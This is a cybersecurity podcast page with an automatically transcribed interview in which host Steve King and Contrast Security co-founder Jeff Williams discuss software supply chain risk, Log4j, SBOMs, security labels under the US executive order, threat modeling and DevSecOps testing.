menu

Improving The Market With Higher Security

In this episode of Cybersecurity (Marketing) Unplugged, Williams also discusses:

  • How working from home impacts software development and security;
  • The use of Executive Order: Zero Trust, security labels and creating visibility in the market;
  • Company mandates and making the market more competitive by achieving a higher level of security.

Jeff Williams is the co-founder and CTO of Contrast Security, the industry’s most modern and comprehensive code security platform that removes security roadblock inefficiencies and empowers enterprises to write and release secure application code faster. Williams founded, set up and kicked off the Open Web Application Security Project (OWASPA) foundation, a non-profit online community that produces freely available articles, methodologies, documentation, tools and technologies in the field of web application security.

 Contrast Security serves tens of thousands of developers in some of the largest brand name companies in the world, including BMW, DocuSign, Zurich and the American Red Cross, as well as other leading global fortune 500 enterprises. Contrast also partners with AWS, IBM, Google, Microsoft and VMware, bringing security into cloud applications. For over 25 years, Williams’s passion has been improving the security of the world’s software.

I think it’s people’s right to understand the security of the products that they’re using, and software is the most black box of a product. You can imagine it’s very difficult to tell whether the software is secure or not. From a user perspective, it’s not like a car where you can take it to the shop and they can fix it in a few minutes…. Detecting these vulnerabilities is super hard. So we need to put incentives in place for companies to do the right thing, to build security programs that ensure the software of their code and then disclose what they did.

Full Transcript

This episode has been automatically transcribed by AI, please excuse any typos or grammatical errors. 

Steve King  00:13

Good day, everyone. I’m Steve King, the managing director of cyber theory. Today’s episode is going to focus on dev SEC ops. Joining me today is Jeff Williams, the co founder and CTO of contrast, security, the industry’s most modern and comprehensive code security platform that removes security, roadblock inefficiencies, and empowers enterprises to write and release SECURE application code faster, is also the guy who founded setup and kicked off the OWASP foundation. Contra has serves 10s of 1000s of developers. It’s some of the largest brand name companies in the world, including folks at BMW DocuSign, Zurich, and the American Red Cross, as well as numerous other leading global fortune 500 enterprises. Contrast also partners with AWS, IBM, Google, Microsoft and VMware to bring security into cloud applications. So welcome, Jeff. I’m glad you could join me today.

Jeff Williams  01:17

Thanks, Steve. Great to be here. Can you talk to us about the use of open source software and the development process as it’s pretty fairly timely, we should have that quick question and discussion given what’s happened in the last seven days or so? Yeah, well, it’s I mean, it’s huge. It’s so widely used is so massive, when I when I started doing AppSec, we would see apps that had you know, a handful of libraries, and developers would download them, you know, and use them. Today, it’s completely changed. It’s so automated developer includes one library, in their application declarations, and then it pulls in all these transitive dependencies. So one library depends on another depends on another. We see libraries with hundreds, sometimes 1000 libraries, that visual image is frightening. It is because, you know, like, you look at something like lock for J, which is all in the news this week. And you realize, like there’s three guys that are maintaining that piece of software, that’s propping up most of the the internet, you know, Java is more than probably more than half of the the interesting critical applications that are out there. And it’s, you know, it’s relying on luck for J, which, you know, now has this devastating vulnerability. Okay, he

Steve King  02:37

would appear to some of us that this whole work from home thing is here to stay. How much of an impact does it have on software development and security?

Jeff Williams  02:49

Well, look, I think most developers are already capable of working from home, even pre COVID. And you know, this, I think it’s a good opportunity to put some more controls around that part of the supply chain. You know, one of the things that SolarWinds pointed out was that if you compromise the development environment, whether it’s the build server, or any of the other tools that are used to create code editors, and plugins, and testing tools, and so on all that stuff. If an attacker gets into that, then they can Trojan the code that you’re creating, and affect all of your downstream customers. So it’s really a critical piece to get right. I think we’ve seen a lot more moving of that infrastructure to the cloud. So you know, now applications are built using Cloud tools. And that’s an opportunity to put controls around them and rely less on you know, like the individual developer and their laptop shouldn’t be the the machine that’s responsible for pushing critical software into the into repositories where people end up using it. Because who knows what’s on that laptop, I mean, developer, developers download all kinds of stuff, you know, maybe their kids are playing Minecraft on their nose. That’s not shouldn’t be part of, you know, critical software supply chain infrastructure.

Steve King  04:07

However, it appears as though it is and it’s almost impossible, given what we’ve just described, to sort of ferret out what’s, what’s the game plan for the future? How do we how do we avoid these kinds of attacks going forward?

Jeff Williams  04:24

Well, for SolarWinds, I think that you know, and other related kinds of attacks, I think what we need to do is maintain integrity between the source code that gets created, like a developer can use whatever tools they want to write that code and committed into a repo. But then we need to check and make sure that you know, after all, the build processes happen and everything happens. We finally get an executable and we’re about to push it into a code repo, we should check to make sure that that that that binary matches the code that we committed in the first place. If it doesn’t Something went haywire in the middle during that, during that build process somewhere. And we need to figure out why there’s that that integrity mismatch, if you will.

Steve King  05:11

We’ve seen a bunch of executive orders around this from the administration here in the last, what, 90 days, I guess, and S bomb being one of them, what impact do you think that’s going to have on dev SEC ops? And, and how important is s bomb to the larger problem? I mean, if we wouldn’t have been able, for example, we had software bill of material around solid, whether would have been willing to help us put it?

Jeff Williams  05:41

No, well, no, probably not. But the executive order, I think, is really strong. It’s broad. And it’s visionary, it’s got a aggressive model to change the way that the software market works. And really, I think that’s the key to fixing all the security problems that we’ve had in application security, because it focuses on making application security visible. So really, in the executive order, there pushes for kind of three things, something called zero trust, which I’m sure you’ve talked about with with other guests, that are apps like testing, which is where I spend most of my time s bomb and suffer security labels. All those things, I think, helped to create visibility in the market. And that will allow consumers to make informed decisions about the software that they use. So imagine, you know, when you go to sign up for an online bank, there was a sticker in the window that said, Hey, this is, you know, a C, or some other rating scheme, that would tell you that this isn’t the most trustworthy software, it’s kind of like the restaurants in New York City where you go, and you can see, hey, this one’s a C, or a B, or an A, you’re probably gonna want to do your online banking in a, and that would represent that letter grade was sort of represent the kind of security work that you put into making sure that code was was correct. And I think that’s where we’re headed. You know, Singapore and Finland already have software security labels mandated. It’s working. And one part of this executive order is for NIST to go investigate. Setting up a program like that for the United States, right? That’s really exciting.

Steve King  07:27

Is this going to be the governing body that makes that determination and then creates those labels like the FDA does for for food

Jeff Williams  07:36

mist, it will probably create the standards that that drive the program forward, right now, they’re sort of looking at coming up with a design of a program that could work at, you know, United States software scale. And that’s a little tricky. I’ve submitted a bunch of input to that I spoke with their their workshop on it, but they’ll come up with the standards, and then I suspect there will probably be another agency, or maybe it’s part of the probably sec, or some part of another agency to actually execute on that program.

Steve King  08:12

How important is threat modeling in that process?

Jeff Williams  08:15

Really glad you asked about that. One of the other standards that NIST issued under the executive order is a minimum standard for application security testing. And in that standard, they require Threat Modeling. They also require the use of a bunch of different kinds of application security testing tools, and they require fixing of problems that are found by those tools. So it’s actually you know, it’s a much more rigorous program than what we had in the past, which is basically like you have to use a testing tool. But you’re not required to fix anything. And it’s in there’s no threat modeling. So we don’t know that you’re testing the right stuff. So I think this is a big step forward. And threat modeling. So recently, over the last two years has become much more important. It’s now part of the PCI software security standard. So you’re required to do that. It’s also part of the the latest OWASP, top 10. And so, which is also required by a number of organizations and other standards. So I think really, organizations should be looking at threat modeling as something that they need to be doing. And if they’re not doing it, which is a lot of companies, then they need to start a program and really get that process working.

Steve King  09:29

So what are your thoughts on mandates? Generally? I mean, what we’re talking about here, essentially, is our mandate our mandates around companies that do business with the federal government via the argumentative fence for the most part, I believe, and And what about everybody else that isn’t and isn’t part of that supply chain? How do we, when and how if the government’s going to do that, going to insist upon regardless of Whether or not you’re part of the supply chain, or that can that contractual supply chain or an AI, that you have to do these things as well?

Jeff Williams  10:08

Yeah, I mean, you know, generally, I’m not a fan of loss of regulation. But when there is a genuine market failure, that I think it’s what has to happen and the software market is broken, consumers don’t have enough information to make informed decisions about the software that they’re buying, it’s very difficult to get that information, the producer is in the best position to generate that information and, and share it. So I think, you know, in terms of the kinds of mandates that we could put on companies, you know, we could create tax incentives, we can create tax penalties for insecure software, we can create criminal liability for insecure software, you put developers in jail, we could do it, there’s a ton of things that we could do. So I think the approach that the executive order takes by mandating visibility and transparency is the least intrusive way of achieving the goals here. So that we can fix the market, the market can now be competitive about how much security is right for the market, and achieve a much better level of security. So like, I think, you know, putting it on government agencies has a broad, you know, blast radius, it’s gonna affect lots of companies that, you know, they do some business with the government, they do business with private sector. And so it’s gonna affect a lot of people. And I think it’ll drag the rest of the market with it.

Steve King  11:41

That’s an interesting idea. The challenge, it seems to me among many challenges here, but one of the primary challenges it would seem to me to be that how do you ensure that the folks in in dev SEC ops are, are actually vetting those software components back to open source again, that are have multiple library different dependencies in the wild? I don’t even know, how would you know how you would go about doing that?

Jeff Williams  12:11

Well, you know, I think the right thing is to create visibility, and enable consumers to choose software that has the right things, you know, so that they can check to see hey, did you make sure all the libraries have no known vulnerabilities? Did you do security testing? Was this threat model? What threats? Are you defending against? Are your developers trained in security, we can make all those kinds of things visible to consumers. And then, you know, there there may be penalties for lying on those levels. If you, you know, intentionally mislead folks, then there, you can imagine penalties around that.

Steve King  12:51

It’s a tough question. There’s no, there’s no easy way. You know, we see what happens when there’s no consequences for criminal behavior. We’re seeing that in major cities throughout the country, right now, it’s hard for me to connect the dots between consequences, intentional or otherwise, for code release that, that it hasn’t done the required diligence.

Jeff Williams  13:17

I don’t think that companies will allow their software to go out the door with a label on it, or an S bombers or anything else that says that their software has major security problems, labels, change markets, if you look at, you know, almost every other product out there, there’s labels for it, right? We have labels on cars, and drugs and food and videos and record albums. We put labels on my water heater has a label an Energy Star label that says, you know, facts that I need to understand about energy. And suffer shouldn’t be different.

Steve King  13:55

Right? Especially in an age where we are, our world is digital. So we have a larger responsibility or not.

Jeff Williams  14:06

I think it’s people’s right to understand the security of the products that they’re using. And software is like the most kind of black box of a product, you can imagine it’s very difficult to tell whether software is secure or not. from the user perspective, it’s not like a car where you can take it to the shop, and they can you know, in a few minutes, they can tell you like, Oh, that’s pretty good car suffered is millions of lines of code, and many millions of lines of library code, all combined together in a big mess. And you know, detecting these vulnerabilities is super hard. So you know, we need to put incentives in place for companies to do the right thing to build security programs that ensure the software of their code, and then disclose what they did. So that as a consumer you can choose from providers that do software the right way.

Steve King  14:57

Yeah, and consumers don’t seem to care about One way or the other, because we, we have the inverse of that right now with, you know, well, it’s not a warning label, it’s a it’s a label, it’s a Terms of Use label, it says, you accept all liability and all bets are off. And people happily click the have read and understood and agree box right there. Regardless of whether they have read, understood or agree, in order to simply have access to the, whatever the tool or application or, or

Jeff Williams  15:31

exactly a symptom of this, you know, the blind risk that users are taking all the time, because you have no idea whether the online banking application you’re using to manage your finances is any good or not. Right. So

Steve King  15:48

talk to our listeners about the differences between application security testing, and code testing, and, and in what ways you deal with third party open source code.

Jeff Williams  16:02

Sure, so automate, I’ll differentiate between quality testing and security testing, and then talk about how we do them together. So automated quality testing is a big part of DevOps, the goal there is you want to create a pipeline, that automatically ensures the quality of the code that get as it’s getting built, putting that in place will allow you to iterate much faster, you can write little pieces of code, push it to the pipeline, get it all tested, and deploy quicker. Security Testing has, unfortunately, traditionally has been mostly manual and mostly pushed kind of late in the process, typically, right before deployment. And so it’s kind of messing up DevOps, because you know, the process will work, the application will get built in, it’s about to go to production, and security intervenes and says, Hey, you can’t push that to production, because we think there’s a vulnerability. And it’s been a noisy process at slow and requires a lot of expertise, as I talked about before. So traditionally, security has been, you know, kind of at odds with high speed development. So what we spend our time on is trying to make security testing compatible with QA testing, so that as you do your QA testing your normal automated test in your pipeline, security testing is going on in the background, automatically. And, you know, we build that right into the environment so that you don’t have to do anything but build, test and deploy your code. And the the end result will be you get something that’s QA tested, and security testing that that aligns those two groups together. Now, regarding third party, open source components, you know, that luck for J thing is a great example of why we need to stay on top of open source code. But it’s not really a separate problem from quality testing and security testing, you really have to test a whole application altogether. Doing you don’t want to do like analyze the custom code, separately from the libraries with different tools. Because it’s one app, it’s one thing. So you know, to test the custom code, you have to understand what libraries it’s using. And to test the libraries, you have to understand how the code uses those libraries. So we think the best approach there is to get tools that analyze both the code and the libraries all together. That’s when these vulnerabilities like this blog for Shell vulnerability, become visible, really, for that vulnerability. It’s not just a library problem. It’s actually developers, putting untrusted data into law API’s is also required for that to be, you know, to be exploited. So there’s a piece that’s like, gotta be custom code. There’s a piece that’s kind of how the libraries that you’re using work, and you need all of that to work together.

Steve King  18:53

In your estimation, what’s the percentage of, you know, just private business that actually does what you describe today?

Jeff Williams  19:01

Well, there are a number of organizations that are getting really good at this, that they’ve built security into their automated pipeline. And every time they change the code, it goes to the pipeline and gets both QA tested and security tested. They establish a fast feedback loop right back to developers so developers can quickly fix that code. And I’ll challenge your, your listeners to think about what’s the How long’s that feedback loop take, they call that the meantime to remediate? And sort of the traditional approach to security with these expert tools. The meantime to remediate is 315 days is way too long. So you know, we can use modern tools and cut that down to a week or a day. In some cases, companies like Comcast has been really vocal about how they’ve established that process, and how well it’s working. And ultimately, they end up saving saving a ton of money because they don’t have to carry around this huge backlog of vulnerabilities. That’s, you know, expensive. But I’d say, look, it’s it still is the minority of big companies that are, are doing this, you know, I’d like to think contrast customers are at kind of the top end of that scale, we’ve reduced the meantime, remediate across all of our customers to eight days, we’re trying to, we’re continually trying to push that down. We think that’s a great number. But it’s something that, you know, I think, is critical to succeeding, as you know, in the marketplace for almost every industry, the companies that master this, that are best at producing high quality, high security code, in a very agile manner, like able to quickly change and adapt. Those are the companies that are going to win every sector. That’s what people mean, when they say Software is eating the world, it’s the companies that are great at software will win. And so, you know, the ones that are really trying to compete trying to be the best in their sector, they’re the ones that are getting great at this. Right.

Steve King  21:09

I’m conscious of the time here, I want to get a final question. And I think that it could be around digital transformation. So it seems like dt is pushing the entire security ecosystem into what I call uncomfortable contracts, contortions. Or, the question is, are we going too fast? Pushing too fast toward digital transformation? And if so, what can we do to pump the brakes a bit? So folks can, you know, catch up digitally, from a mia dev SEC ops point of view? Yeah,

Jeff Williams  21:45

well, you know, adopting new technologies fast without thinking about the security consequences and kind of waiting. And until the technologies are widely deployed, to really get security researchers digging into them, and looking at them, probably isn’t a super healthy process. However, I don’t think there’s much we can do about it. Development is under huge amounts of pressure from business to innovate, push forward faster, it’s really up to security to change the way that we do security, we have to adapt to the environment. So you know, traditional security is slow, it’s got a lot of big heavyweight processes that, you know, are very sort of waterfall thinking. And we need to change this, we need to adapt, and, you know, just focus on the biggest threats and make sure that our defenses are in place that we’ve tested those defenses, make sure they’re correct and effective. And we make that evidence visible. So everyone can, you know, see how security how secure things are. And then we need runtime protection in production, to make sure that we can see attacks and respond quickly when we are attacked. But it’s a transformation that has to happen to security and security folks are are resisting that change. They like lots of requirements. And they like, you know, big monolithic efforts, like building a security architecture and doing a pen test and big processes that cover the whole scope of threats from the biggest threats all the way to the littlest threats. And it doesn’t make sense, we’ve got to shatter those old processes, and focus on one thread at a time. really narrow, really agile, to get the best results.

Steve King  23:34

Yeah, I’m not sure that I can find too many Caesars that would agree with you that they’re fond of big monolithic efforts, I think they’re fond of trying to do their jobs, which is, which is to make the their world a safer place to be for their customers and stakeholders and shareholders, etc. And perhaps from your point of view, and it makes sense that, you know, contrast is part of the calculus that will get them there more quickly. And, and from that point of view, I guess that that’s sort of what your message to the market is, right?

Jeff Williams  24:14

Yeah, we’ve got a unique platform that supports, you know, kind of all three of the major challenges in app sec, there’s a challenge around writing secure code, there’s a challenge around the supply chain. And there’s a challenge around runtime operations security at the application layer. And we’ve got a unified platform with the newest APSET technologies in all three of those areas that you can add to your company. And I think, you know, we were a platform that you can build a modern application security practice on. So you know, that’s, that’s why we’re here. That’s what we do.

Steve King  24:50

Yeah. Well, it sounds terrific. I urge folks to check it out. We’re out of time today, however, but I wanted to thank our guests Jeff Williams again for taking time out of his schedule for to join us. And what I thought was a was a thought provoking exchange around some of the some of the major problems in getting to where we want to be from a secured operating environment perspective. Thanks, Steve. Appreciate it. And thank you to our listeners for joining us in another one of cyber theories unplugged reviews of the wild world of cybersecurity technology and our new digital reality. Until next time, I’m your host Steve King, signing out